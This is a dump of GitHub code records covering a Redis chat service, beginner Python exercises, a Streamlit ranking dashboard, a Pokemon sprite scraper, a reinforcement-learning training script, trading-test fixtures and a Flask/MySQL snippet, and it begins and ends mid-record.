read_data_stream(self, room_id: str, last_id: str = b\"$\"):\n stream = f\"room:{room_id}:stream\"\n events = await self._redis.xread(streams={stream: last_id}, block=0)\n return events\n \n async def announce(self, room_id: str, username: str, type: str):\n await self.send_message_to_stream(room_id, {\"type\": type, \"username\": username})\n\n\nclass ChatService:\n def __init__(\n self,\n redis_service: RedisService,\n user_collection: User,\n room_collection: Room,\n message_collection: Message,\n ):\n self.redis_service = redis_service\n self._users = user_collection\n self._rooms = room_collection\n self._messages = message_collection\n\n def make_chat_info(self, user: User, room: Room) -> str:\n return f\"{user.id}:{user.username};{room.id}:{room.name}\"\n\n async def create_chat(self, user: User, chat_name: str) -> Room:\n room = await self._rooms.insert_one(\n Room(admin_id=user.id, name=chat_name, members=[user.id])\n )\n return room\n \n async def save_message(self, author: str, text: str, room_id: str) -> Message:\n message = await self._messages.insert_one(Message(author=author, text=text))\n room = await self._rooms.get(room_id)\n room.messages.append(message.id)\n await room.save()\n return message\n\n async def get_chat(self, room_id: str) -> Room:\n try:\n chat = await self._rooms.get(room_id)\n except ValidationError:\n return None\n return chat\n\n async def get_user(self, user_id: str) -> User:\n user = await self._users.get(user_id)\n return user\n\n async def add_user_to_chat(self, user_id, room_id: str) -> Room:\n room = await self._rooms.get(room_id)\n room.members.append(user_id)\n await room.save()\n return room\n\n async def get_user_chats(self, user_id: str) -> list[Room]:\n rooms = await self._rooms.find(Room.members == user_id).to_list()\n return rooms\n \n async def get_chat_history(self, room_id: str, offset: int = 0, limit: int = 10):\n room = await self._rooms.get(room_id)\n messages = await self._messages\\\n .find_many({\"_id\": {\"$in\":room.messages}})\\\n .skip(offset).limit(limit).to_list()\n return messages\n\n async def ws_receive(self, websocket: WebSocket, username, room_id, user_id):\n if await self.redis_service.user_room_exists(username, room_id) is False:\n await self.redis_service.add_user_to_room(username, room_id)\n await self.redis_service.announce(room_id, username, \"join\")\n try:\n while True:\n message = await websocket.receive_json()\n\n fields = {\n \"type\": \"message\",\n \"username\": username,\n \"message\": message,\n \"room\": room_id,\n }\n await self.redis_service.send_message_to_stream(room_id, fields)\n await self.save_message(author=user_id, text=message, room_id=room_id)\n except WebSocketDisconnect:\n await self.redis_service.remove_user_from_room(username, room_id)\n await self.redis_service.announce(room_id, username, \"leave\")\n await websocket.close()\n\n async def ws_send(self, websocket: WebSocket, room_id):\n last_id = b\"$\"\n while True:\n events = await self.redis_service.read_data_stream(room_id, last_id)\n for event in events:\n last_id = event[1][0][0]\n fields = event[1][0][1]\n await websocket.send_json(fields)\n await asyncio.sleep(1)\n","repo_name":"neekrasov/ws_chat","sub_path":"chat/services/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"72428113170","text":"import math\n\nmovie = input()\nmovie_duration = int(input())\nbreak_duration = int(input())\n\nlunch_duration = break_duration / 8\nrelax_time = break_duration / 4\n\ntime_for_movie = break_duration - lunch_duration - relax_time\n\ndiff = abs(time_for_movie - movie_duration)\n\nif time_for_movie >= movie_duration:\n print (f'You have enough time to watch {movie} and left with {math.ceil(diff)} minutes free time.')\nelse :\n print (f\"You don't have enough time to watch {movie}, you need {math.ceil(diff)} more minutes.\")\n","repo_name":"Javor18/Programming_Basics_with_Python","sub_path":"Conditional_Statements/Exercise/Lunch_Break.py","file_name":"Lunch_Break.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41832767270","text":"\ndef check_user_input(userQuestion, in_range=(0,0), y_or_n = False, is_date = False):\n\n checking = True\n while checking:\n userInput = input(userQuestion + '\\n')\n\n if is_date:\n if userInput[2] == '/' and userInput[5] == '/' and len(userInput) == 10:\n try:\n test = int(userInput[0:2])\n test = int(userInput[3:5])\n test = int(userInput[6:10])\n except:\n print('Error: Incorrect date format')\n else:\n checking = False\n return userInput\n else:\n print('Error: Incorrect date format')\n\n if in_range != (0,0):\n try:\n test = int(userInput)\n except:\n print('Error: Input is not number')\n else:\n if int(userInput) in range(in_range[0], in_range[1]):\n checking = False\n return int(userInput)\n else:\n print('Error: Number not an option')\n \n if y_or_n:\n yn = ['Y', 'y', 'N', 'n']\n if userInput in yn:\n if userInput in yn[:2]:\n checking = False\n return True\n else:\n checking = False\n return False\n else:\n print('Error: Input not Y/N')\n\n\n","repo_name":"finnbassill/Walmart-Order","sub_path":"Walmart-Order/mac/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20909949964","text":"#importing libraries\r\nimport streamlit as st\r\nimport numpy as np\r\nimport pandas as pd \r\nimport os\r\nimport matplotlib.pyplot as plt\r\nplt.style.use(\"seaborn-whitegrid\")\r\nimport seaborn as sns\r\nfrom collections import Counter\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nst.set_page_config(\r\n page_title=\"World Ranking Universities\",\r\n page_icon=\"🧊\",\r\n layout=\"centered\",\r\n initial_sidebar_state=\"expanded\",\r\n menu_items={\r\n 'Get Help': 'https://www.extremelycoolapp.com/help',\r\n 'Report a bug': \"https://www.extremelycoolapp.com/bug\",\r\n 'About': \"# This is a header. This is an *extremely* cool app!\"\r\n }\r\n)\r\n\r\nst.balloons()\r\nst.title('World Ranking Universities')\r\n\r\nst.success(\"Welcome to the analysis of your future! Listen to some relaxing music while exploring our page.\")\r\n\r\n#importing dataset\r\ntimesData = pd.read_csv(\"timesData.csv\")\r\n\r\n\r\naudio_file = open('Welcome Ringtone.oga', 'rb')\r\naudio_bytes = audio_file.read()\r\n\r\nst.audio(audio_bytes, format='audio/ogg')\r\n\r\nif st.checkbox('Show head of data'):\r\n st.subheader('data head')\r\n st.write(timesData.head())\r\n\r\n\r\nimport plotly\r\nimport plotly.graph_objs as go\r\n\r\n\r\n#Line chart:\r\ndf = timesData.iloc[:100, :]\r\n\r\nline1 = go.Scatter(\r\n x = df.world_rank, \r\n y = df.citations, \r\n mode = \"lines\", \r\n name = \"citations\", \r\n marker = dict(color = 'rgba(16, 112, 2, 0.8)'),\r\n text= df.university_name) \r\n\r\nline2 = go.Scatter(\r\n x = df.world_rank,\r\n y = df.teaching,\r\n mode = \"lines+markers\",\r\n name = \"teaching\",\r\n marker = dict(color = 'rgba(255, 0, 0, 0.8)'),\r\n text= df.university_name)\r\n\r\ndata = [line1, line2]\r\nlayout = dict(title = 'Line Chart representing the Citation and Teaching vs World Rank of Top 100 Universities',\r\n xaxis= dict(title= 'World Rank',ticklen= 5,zeroline= False, gridcolor='rgb(248, 248, 255)')\r\n )\r\n\r\nfig1 = dict(data = data, layout = layout) \r\n\r\nst.write(fig1)\r\n\r\nif st.button('Explanation', 1):\r\n st.write('The line chart above shows that the for almost all the world ranked universities, the citations ranking was higher than the teaching ranking.This proves that the citation ranking is an important criteria for the world universities ranking.')\r\n\r\n\r\n\r\n#Bar Chart and Line Chart\r\nfrom plotly import tools\r\nimport matplotlib.pyplot as plt\r\n\r\ndf2016 = timesData[timesData.year == 2016].iloc[:7,:]\r\n\r\ny_saving = [each for each in df2016.research]\r\ny_net_worth = [float(each) for each in df2016.income]\r\nx_saving = [each for each in df2016.university_name]\r\nx_net_worth = [each for each in df2016.university_name]\r\n\r\ntrace0 = go.Bar(\r\n x=y_saving,\r\n y=x_saving,\r\n marker=dict(color='rgba(171, 50, 96, 0.6)',line=dict(color='rgba(171, 50, 96, 1.0)',width=1)),\r\n name='research',\r\n orientation='h',\r\n)\r\n\r\ntrace1 = go.Scatter(\r\n x=y_net_worth,\r\n y=x_net_worth,\r\n mode='lines+markers',\r\n line=dict(color='rgb(63, 72, 204)'),\r\n name='income',\r\n)\r\n\r\nlayout = dict(\r\n title='Bar Chart and Line Chart comparing the Research to Professors Income of top 7 Universities in 2016',\r\n yaxis=dict(showticklabels=True,domain=[0, 0.85]),\r\n yaxis2=dict(showline=True,showticklabels=False,linecolor='rgba(102, 102, 102, 0.8)',linewidth=2,domain=[0, 0.85]),\r\n xaxis=dict(zeroline=False,showline=False,showticklabels=True,showgrid=True,domain=[0, 0.42]),\r\n xaxis2=dict(zeroline=False,showline=False,showticklabels=True,showgrid=True,domain=[0.47, 1],side='top',dtick=25),\r\n legend=dict(x=0.029,y=1.038,font=dict(size=10) ),\r\n margin=dict(l=200, r=20,t=70,b=70),\r\n paper_bgcolor='rgb(248, 248, 255)',\r\n plot_bgcolor='rgb(248, 248, 255)',\r\n)\r\n\r\nannotations = []\r\ny_s = np.round(y_saving, decimals=2)\r\ny_nw = np.rint(y_net_worth)\r\n\r\n# Adding labels\r\nfor ydn, yd, xd in zip(y_nw, y_s, x_saving):\r\n # labeling the scatter savings\r\n annotations.append(dict(xref='x2', yref='y2', y=xd, x=ydn - 4,text='{:,}'.format(ydn),font=dict(family='Arial', size=12,color='rgb(63, 72, 204)'),showarrow=False))\r\n # labeling the bar net worth\r\n annotations.append(dict(xref='x1', yref='y1', y=xd, x=yd + 3,text=str(yd),font=dict(family='Arial', size=12,color='rgb(171, 50, 96)'),showarrow=False))\r\n\r\nlayout['annotations'] = annotations\r\n\r\n# Creating two subplots\r\nfig2 = tools.make_subplots(rows=1, cols=2, specs=[[{}, {}]], shared_xaxes=True,\r\n shared_yaxes=False, vertical_spacing=0.001)\r\n\r\nfig2.append_trace(trace0, 1, 1)\r\nfig2.append_trace(trace1, 1, 2)\r\n\r\nfig2['layout'].update(layout)\r\n\r\nst.write(fig2)\r\n\r\nif st.button('Explanation', 2):\r\n st.write('The figure below shows that while Harvard University has the highest research ranking, its professors income are the lowest, while the research ranking of Massachussets university is the lowerst, they have the 2nd higher income in 2016.')\r\n\r\n\r\ndf2016 = timesData[timesData.year == 2016].iloc[:7,:]\r\npie1 = df2016.num_students\r\n\r\npie1_list = [float(each.replace(',', '.')) for each in df2016.num_students] \r\nlabels = df2016.university_name\r\n\r\ndata= [\r\n {\r\n \"values\": pie1_list,\r\n \"labels\": labels,\r\n \"domain\": {\"x\": [0, .5]},\r\n \"name\": \"Number Of Students Rates\",\r\n \"hoverinfo\":\"label+percent+name\",\r\n \"hole\": .05,\r\n \"type\": \"pie\"\r\n }]\r\n\r\nlayout={\r\n \"title\":\"Pie Chart representing the Students rate of top 7 Universities in 2016\",\r\n \"annotations\": [\r\n { \"font\": { \"size\": 20},\r\n \"showarrow\": False,\r\n \"text\": \"Number of Students\",\r\n \"x\": 0.20,\r\n \"y\": 1\r\n },\r\n ]\r\n }\r\n\r\nfig3 = go.Figure(data=data, layout=layout)\r\n\r\nst.write(fig3)\r\n\r\nif st.button('Explanation', 3):\r\n st.write('The pie chart above shows that the highest rate of students is found in Harvard University, while the lowest rate of students is found in California Insitute of Technology.')\r\n\r\n\r\n#Pie Chart\r\nimport plotly.figure_factory as ff\r\n\r\ndataframe = timesData[timesData.year == 2015]\r\ndata2015 = dataframe.loc[:,[\"research\",\"international\", \"total_score\"]]\r\ndata2015[\"index\"] = np.arange(1,len(data2015)+1)\r\n\r\nfig4 = ff.create_scatterplotmatrix(data2015, diag='box', index='index',colormap='Portland',\r\n colormap_type='cat',\r\n height=700, width=700, title = \"Scatterplot Matrix representing the correlation between research, international and total score.\")\r\n\r\n\r\n#Multiple Sub-plots\r\ntrace1 = go.Scatter(\r\n x=dataframe.world_rank,\r\n y=dataframe.research,\r\n name = \"research\"\r\n)\r\ntrace2 = go.Scatter(\r\n x=dataframe.world_rank,\r\n y=dataframe.citations,\r\n xaxis='x2',\r\n yaxis='y2',\r\n name = \"citations\"\r\n)\r\ntrace3 = go.Scatter(\r\n x=dataframe.world_rank,\r\n y=dataframe.income,\r\n xaxis='x3',\r\n yaxis='y3',\r\n name = \"income\"\r\n)\r\ntrace4 = go.Scatter(\r\n x=dataframe.world_rank,\r\n y=dataframe.total_score,\r\n xaxis='x4',\r\n yaxis='y4',\r\n name = \"total_score\"\r\n)\r\n\r\ndata = [trace1, trace2, trace3, trace4]\r\nlayout = go.Layout(\r\n xaxis=dict(\r\n domain=[0, 0.45]\r\n ),\r\n yaxis=dict(\r\n domain=[0, 0.45]\r\n ),\r\n xaxis2=dict(\r\n domain=[0.55, 1]\r\n ),\r\n xaxis3=dict(\r\n domain=[0, 0.45],\r\n anchor='y3'\r\n ),\r\n xaxis4=dict(\r\n domain=[0.55, 1],\r\n anchor='y4'\r\n ),\r\n yaxis2=dict(\r\n domain=[0, 0.45],\r\n anchor='x2'\r\n ),\r\n yaxis3=dict(\r\n domain=[0.55, 1]\r\n ),\r\n yaxis4=dict(\r\n domain=[0.55, 1],\r\n anchor='x4'\r\n ),\r\n title = 'Multiple Subplots representing the Research, citation, income and total score VS World Rank of Universities'\r\n)\r\nfig5 = go.Figure(data=data, layout=layout)\r\nst.write(fig5)\r\n\r\nif st.button('Explanation', 5):\r\n st.write('The subplots above show that there is a positive correlation between the total score of the university rank and the income and citations they have. While there is a negative correlation between research and total income, which proves that the research has no impact on the ranking of the university if there was no citations for these researches.')\r\n\r\n\r\n","repo_name":"rawane1521/myProject","sub_path":"code1.py","file_name":"code1.py","file_ext":"py","file_size_in_byte":8605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28849417853","text":"class Solution:\n def closeStrings(self, word1: str, word2: str) -> bool:\n '''\n T: O(n) and S: O(n)\n '''\n if len(word1) != len(word2): return False \n \n c1, c2 = Counter(word1), Counter(word2)\n \n return c1.keys() == c2.keys() \\\n and Counter(c1.values()) == Counter(c2.values())\n","repo_name":"shoaibur/Software-Engineering","sub_path":"Leetcoding-Actions/Explore-Monthly-Challenges/2021-01/22-determineIfTwoStringsAreClose.py","file_name":"22-determineIfTwoStringsAreClose.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"42821530712","text":"import re;\n\n\ntext = \"А ты знал, что ВТ – лучшая кафедра в ИТМО?\"\nphrase_pattern = \"ВТ(\\W+\\w+){,3}\\W+ИТМО\"\nword_pattern = \"\\w+\"\n\ndef proga():\n phrase = re.search(phrase_pattern, text)\n result = re.findall(word_pattern, phrase.group(0)) \n string = \"\"\n for word in result:\n string += word + \" \"\n print(string) \n\nproga() ","repo_name":"alsiva/progalab4","sub_path":"reg_exp.py","file_name":"reg_exp.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10168839281","text":"#importujemy odpowiedni moduł\r\nimport matplotlib.pyplot as plt\r\n\r\n#aby narysowac wykres potrzebujemy dwóch tablic liczb: x i y\r\n#y to będzie tablica z wartościami funkcji x**2\r\n#w zakresie do petli sa podane wartosci\r\n#w petli obliczone elementy dorzucamy do listy\r\n#mozna tez napisac y.append(liczba**2)\r\nx=[-4,-3,-2,-1,0,1,2,3,4]\r\ny=[]\r\n\r\nfor liczba in x:\r\n y+=[liczba**2]\r\n\r\n\r\n#Ponizsze 3 komendy sa podobne do matlabowych\r\n# Plot rysuje, xlabel i ylabel nadaja nazwy dla etykiet\r\n\r\nplt.plot(y)\r\nplt.xlabel('X')\r\nplt.ylabel('Y')\r\n\r\n\r\n#jeśli chcemy narysowac jeszcze jeden wykres o innych kolorach\r\ny1=[]\r\nfor liczba in x:\r\n y1+=[liczba**2+1]\r\n\r\nplt.plot(x,y1,'ro-')\r\n\r\n# show pokazuje rysunek\r\nplt.show()\r\n","repo_name":"galursa/UWM","sub_path":"WD/Przyklady/Cw7/Cw7_Przykład1.py","file_name":"Cw7_Przykład1.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28218505183","text":"# This is a tutorial that is posted on pyimagesearch website\n# the first of 2 of 6 segments\n# This segment deals with scarping the database together\n\nfrom bs4 import BeautifulSoup \nimport argparse\nimport requests\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--pokemon-list\", required = True,\n help = \"Path to where the raw Pokemon HTML file resides\")\nap.add_argument(\"-s\", \"--sprites\", required = True,\n help = \" Path where the sprites will be stored\")\nargs = vars(ap.parse_args())\n\n# construct the soup and initialize the list of pokemon names\nsoup = BeautifulSoup(open(args[\"pokemon_list\"]).read())\nnames = []\n\n# loop pver all link elements\nfor link in soup.findAll(\"a\"):\n # update the list of pokemon names\n names.append(link.text)\n\n\n# loop over pokemon names\nfor name in names:\n\n # intialize the parsed name as just the lowercase version of the name\n parsedName = name.lower()\n\n # remove apostrophes\n parsedName = parsedName.replace(\"'\",\"\")\n\n # replace periods + space with dash (i.e Mr. Mime = mr-mime)\n parsedName = parsedName.replace(\". \", \"-\")\n\n # handle the case for Nidoran (female)\n if name.find(u'\\u2640') != -1:\n parsedName = \"nidoran-f\"\n\n # handle the case for Nidoran (male)\n if name.find(u'\\u2642') != -1:\n parsedName = \"nidoran-m\"\n\n # downloading the pokemon sprite\n print(\"[x] downloading %s\" %(name))\n url = \"http://img.pokemondb.net/sprites/red-blue/normal/%s.png\" %(parsedName)\n r = requests.get(url)\n\n # if the status conde is not 200, ignore the sprite\n if r.status_code != 200:\n print(\"[x] error donwloading %s\" %(name))\n continue\n # write the sprite to file\n f = open(\"%s%s.png\" %(args['sprites'], name.lower()), \"wb\")\n f.write(r.content)\n f.close()\n\n\n\n\n \n\n\n","repo_name":"AdamBioprinter/OpenCV-Python-Tutorials","sub_path":"opencv/pyimagesearchTuts/Pokedex1.py","file_name":"Pokedex1.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8526252587","text":"import gym\nimport matplotlib.pyplot as plt\nfrom itertools import count\nimport torch\nfrom networks.deep_endemble_NN_model import GaussianMixtureMLP\nfrom buffer import ReplayMemory\nfrom utilis import * \nfrom logger import set_log_file\nimport logging\nfrom networks.DQN_model import DQN\nimport argparse\n\nparser = argparse.ArgumentParser(description='|model|env|')\nparser.add_argument(\"--model\",default=\"ensemble_DQN\",help=\"DQN or ensemble_DQN\")\nparser.add_argument(\"--env\",default=\"MountainCar-v0\",help=\"CartPole-v1|MountainCar-v0|LunarLander-v2\")\nparser.add_argument(\"--BATCH_SIZE\",type=int,default=300)\nparser.add_argument(\"--NUM_episodes\",default=300)\nparser.add_argument(\"--GAMMA\",default=0.99)\nparser.add_argument(\"--TAU\",default=0.005)\nparser.add_argument(\"--PRINT\",default=False)\nparser.add_argument(\"--render_mode\",default=\"rgb_array\")\nparser.add_argument(\"--device\",default=\"cpu\")\nparser.add_argument(\"--NUM_ensemble\",default=5)\nparser.add_argument(\"--file_identify\",default=\"\")\nparser.add_argument(\"--foot_record\",default=False)\nargs = parser.parse_args()\n\n###############################################################################################\n# config the args\n# set the log file\nset_log_file(f\"log/{args.model}_{args.env}_{args.file_identify}.txt\")\n# set env\nenv = gym.make(args.env,render_mode=args.render_mode)\n# Get number of actions from gym action space\nn_actions = env.action_space.n\n# Get the number of state observations\nstate, info = env.reset()\nn_observations = len(state)\n# set device\ndevice = torch.device(args.device)\n\n# set the model\nif args.model==\"DQN\":\n policy_net = DQN(n_observations, n_actions).to(device)\n target_net = DQN(n_observations, n_actions).to(device)\n optimizer = torch.optim.AdamW(policy_net.parameters(), lr=1e-4, amsgrad=True)\nelif args.model==\"ensemble_DQN\":\n policy_net = GaussianMixtureMLP(args.NUM_ensemble,n_observations, n_actions).to(device)\n target_net = GaussianMixtureMLP(args.NUM_ensemble,n_observations, n_actions).to(device)\n\ntarget_net.load_state_dict(policy_net.state_dict())\n# set the buffer\nbuffer = ReplayMemory(100000)\n\n##########################################################################################################\n\nsteps_done=0\nif __name__==\"__main__\":\n cum_R=[]\n for i_episode in range(args.NUM_episodes):\n # Initialize the environment and get it's state\n state, info = env.reset()\n state = torch.tensor(state, dtype=torch.float32, device=device).unsqueeze(0)\n E_count=0\n for t in count():\n steps_done+=1\n \n if args.foot_record: \n if steps_done<20000:\n logging.info(f\"foot: {state[0,0].item()} {state[0,1].item()}\")\n # select action accroding to Free energy\n if args.model==\"DQN\":\n action,E=select_action(policy_net,state,env,steps_done)\n elif args.model==\"ensemble_DQN\":\n action,E = select_action_FE(policy_net,state,args.PRINT)\n # count the explore step number\n E_count+=E\n # step forward\n observation, reward, terminated, truncated, _ = env.step(action.item())\n \n reward = torch.tensor([reward], device=device)\n done = terminated \n\n if terminated:\n next_state=None\n else:\n next_state = torch.tensor(observation, dtype=torch.float32, device=device).unsqueeze(0)\n\n # Store the transition in memory\n buffer.push(state, action, next_state, reward)\n\n # Move to the next state\n state = next_state\n\n # Perform one step of the optimization (on the policy network)\n # select action accroding to Free energy\n if args.model==\"DQN\":\n optimize_model(buffer,policy_net,optimizer,target_net,GAMMA=args.GAMMA,BATCH_SIZE=args.BATCH_SIZE) \n elif args.model==\"ensemble_DQN\":\n optimize_model_ensemble(buffer,policy_net,target_net,GAMMA=args.GAMMA,BATCH_SIZE=args.BATCH_SIZE,device=device)\n # soft update th target network\n soft_update_model_weights(policy_net,target_net,args.TAU)\n\n if done:\n print(i_episode,\" step: \",t+1)\n logging.info(f\" {i_episode}, step: {t+1},E: {E_count/(t+1)}\")\n cum_R.append(t+1)\n ensemble=True\n if args.model==\"DQN\":\n ensemble=False\n # getRM(policy_net,False,f\"Q_table_best_action/best_action_{args.model}_{i_episode}_{args.file_identify}.png\",ensemble)\n break\n\n print('Complete')\n plt.plot(cum_R)\n plt.show()\n plt.savefig(f\"imgs/cumR_{args.model}_{i_episode}_{args.file_identify}.png\")\n torch.save(policy_net.state_dict(),f\"models_saved/{args.model}_{i_episode}_{args.file_identify}.pt\") \n\n\n\n ","repo_name":"Chevyyyy/Ensemble_Uncertainty_DQN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35962964073","text":"def time_diff():\n start_time = input(\"Enter the start time in the format hr-min-sec: \")\n end_time = input(\"Enter the end time in the format hr-min-sec: \")\n start_hr, start_min, start_sec = map(int, start_time.split(\"-\"))\n end_hr, end_min, end_sec = map(int, end_time.split(\"-\"))\n start_time_in_sec = start_hr * 3600 + start_min * 60 + start_sec\n end_time_in_sec = end_hr * 3600 + end_min * 60 + end_sec\n return end_time_in_sec - start_time_in_sec\n\n\nprint(time_diff())\n","repo_name":"sayantan-2/CSE-DSA-LAB","sub_path":"assignment 4/python/programs/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"20957646346","text":"import pytest\nfrom src.interpreter.interpreter import Interpreter\nfrom src.infrastructure.global_interface import return_context\nfrom trade.api import API\nfrom trade.config import Config\nfrom src.compiler.compiler import Compiler\nfrom src.symbol_filters.compile_functions import SymbolFilterCompiler\nfrom src.compiler.parser import Parser\nfrom src.infrastructure.database_layer import DataBase\nfrom src.infrastructure.redis_layer import RedisInterface\nfrom src.utils import parse_date, parse_datetime\nimport datetime\nimport os\nimport sys\n\n\n@pytest.fixture(autouse=True)\ndef backend():\n chrdir = os.getcwd()\n path = os.path.join(chrdir,'backend_startup.sh')\n os.system(f\"bash {path}\")\n\n\n@pytest.fixture\ndef update_context_time_invariant():\n def closure(interpreter):\n interpreter.context.update_value(\n \"OPEX\", datetime.date(year=2021, month=11, day=19)\n )\n interpreter.context.update_value(\n \"TODAY\", datetime.datetime(year=2021, month=10, day=25)\n )\n interpreter.context.update_value(\n \"TODAY_DATE\", datetime.datetime(year=2021, month=10, day=25).date()\n )\n interpreter.context.update_value(\n \"DISTANCE_TO_OPEX\",\n parse_date(interpreter.context.get_value(\"OPEX\"))\n - datetime.date(year=2021, month=10, day=15),\n )\n interpreter.context.update_value(\n \"DAYS_UNTIL_OPEX\",\n (\n parse_date(interpreter.context.get_value(\"OPEX\"))\n - datetime.date(year=2021, month=10, day=15)\n ).days,\n )\n interpreter.context.update_value(\n \"PREVIOUS_OPEX\", datetime.datetime(year=2021, month=10, day=15)\n )\n return interpreter\n\n return closure\n\n\n@pytest.fixture\ndef db():\n return DataBase(\"test\")\n\n\n@pytest.fixture\ndef teardown(db):\n yield\n print(\"Tearing down\")\n db.drop_collection(\"working_orders\")\n db.drop_collection(\"positions\")\n\n\n@pytest.fixture\ndef redis():\n return RedisInterface()\n\n\n@pytest.fixture\ndef parser():\n return Parser()\n\n\n@pytest.fixture\ndef symbol_filter_compiler():\n return SymbolFilterCompiler()\n\n\n@pytest.fixture\ndef compiler():\n return Compiler()\n\n\n@pytest.fixture\ndef context():\n return return_context(\"test\")\n\n\n@pytest.fixture\ndef interpreter(context):\n return Interpreter(context)\n\n\n@pytest.fixture\ndef config(context):\n config = Config()\n config.test(context)\n return config\n\n\n@pytest.fixture\ndef api(config):\n return API(config.params)\n\n\n@pytest.fixture\ndef opex_description():\n description = {\n \"strategy\": \"opex\",\n \"symbol_pool\": [\"positioning\", \"!biotech\", \"!earnings\"],\n \"position_description\": {\n \"tradeType\": \"SELL_SHORT\",\n \"positionType\": \"single\",\n \"assetType\": \"EQUITY\",\n \"scheduled_close\": 4,\n \"betsize\": {\n \"per_trade\": [\"*\", \"^BANKROLL\", 0.1],\n \"max_bet\": [\"*\", \"^BANKROLL\", 0.12],\n },\n \"stop\": [\"+\", \"@SYMBOL_PRICE\", [\"*\", \"@SYMBOL_PRICE\", 0.1]],\n \"entry_point\": \"MARKET\",\n },\n \"open_position\": {\n \"days\": [\"10-4\"],\n \"times\": [\"9:30\"],\n \"when\": {\"and\": [[\">\", \"^SPY\", [\"-\", \"^SPY_20_DAY_MEAN\", \"^SPY_SIGMA\"]]]},\n \"symbol_filter\": [\n [\n \"filter_csv\",\n \"stock_fundamentals\",\n [\"list\", \"None\"],\n [\"list\", \"Volume\"],\n \"@symbols\",\n \">\",\n 2000000.0,\n ],\n [\n \"filter_csv\",\n \"IV\",\n [\"list\", \"None\"],\n [\"list\", \"Imp Vol\"],\n \"@symbols\",\n \">\",\n 50,\n ],\n [\n \"filter_csv\",\n \"positioning\",\n [\"list\", \"mean\"],\n [\n \"list\",\n \"scaled_direction_day_0\",\n \"scaled_direction_day_1\",\n \"scaled_direction_day_2\",\n \"scaled_direction_day_3\",\n \"scaled_direction_day_4\",\n ],\n \"@symbols\",\n \"<\",\n -0.0025,\n ],\n ],\n },\n \"close_position\": {\"days\": [\"10-4\"], \"times\": [\"15:59\"]},\n }\n\n return description\n\n\n@pytest.fixture\ndef spy_description():\n trade = {\n \"strategy\": \"spy\",\n \"symbol_pool\": [\"load_symbols\", \"SPY\"],\n \"position_description\": {\n \"tradeType\": \"SELL_TO_OPEN\",\n \"assetType\": \"OPTION\",\n \"positionType\": \"spread\",\n \"betsize\": {\n \"per_trade\": [\"*\", \"^BANKROLL\", 0.01],\n \"max_bet\": [\"*\", \"^BANKROLL\", 0.01],\n },\n \"entry_point\": \"2/3rds\",\n \"scheduled_close\": 4,\n \"spread\": {\n \"sell\": {\n \"strike\": [\n \"+\",\n \"^SPY\",\n [\"*\", [\"*\", \"^SPY\", 0.003], [\"-\", \"^DAYS_UNTIL_OPEX\", 3]],\n ],\n \"expiration\": \"^OPEX\",\n \"contractType\": \"PUT\",\n },\n \"buy\": {\n \"strike\": [\n \"round\",\n [\n \"-\",\n \"^SPY\",\n [\"*\", [\"*\", \"^SPY\", 0.006], [\"-\", \"^DAYS_UNTIL_OPEX\", 3]],\n ],\n ],\n \"expiration\": \"^OPEX\",\n \"contractType\": \"PUT\",\n },\n },\n },\n \"open_position\": {\n \"days\": [\"32-4\"],\n \"times\": [\"9:30\"],\n \"when\": {\n \"and\": [\n [\"<\", \"^SPY\", [\"*\", \"^SPY_20_DAY_MEAN\", 1.03]],\n [\">\", \"^SPY\", \"^SPY_20_DAY_MEAN\"],\n ]\n },\n \"symbol_filter\": [[\"in_portfolio\", \"@symbols\", False]],\n },\n \"close_position\": {\n \"days\": [\"31-4\"],\n \"times\": [\"9:30\"],\n \"when\": {\n \"or\": [\n [\"<\", \"^SPY\", \"^SPY_20_DAY_MEAN\"],\n [\">\", \"^SPY\", [\"*\", \"^SPY_20_DAY_MEAN\", 1.03]],\n ]\n },\n },\n }\n\n return trade\n","repo_name":"Morgan-Griffiths/trading_language","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72775253011","text":"from flask import Flask, render_template\nimport mysql.connector as mydb\n\n# コネクションの作成\nconnector = mydb.connect(\nhost='MySQLが動いているサーバー',\nuser='MySQL��ーザ',\npassword='パスワード',\ndatabase='データベース名',\ncharset=\"utf8\"\n)\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return \"Hello world!\"\n\n@app.route(\"/hello\")\ndef hello():\n title=\"FlaskをレンタルサーバXserverで利用する!\"\n subtitle=\"データベースmySQLのInsert,Update,Selectを実行する\"\n return render_template('hello.html', title=title,subtitle=subtitle)\n\n@app.route(\"/select\")\ndef select():\n cursor = connector.cursor()\n sql = \"SELECT id, __name__, age FROM kaiin_table WHERE id=103\"\n cursor.execute(sql)\n result = cursor.fetchall()\n for row in result:\n return \"id:\" + str(row[0]) + \"  name:\" + str(row[1]) + \"さん  age:\" + str(row[2])\n cursor.close()\n connector.close()\n\nif __name__ == \"main\":\n 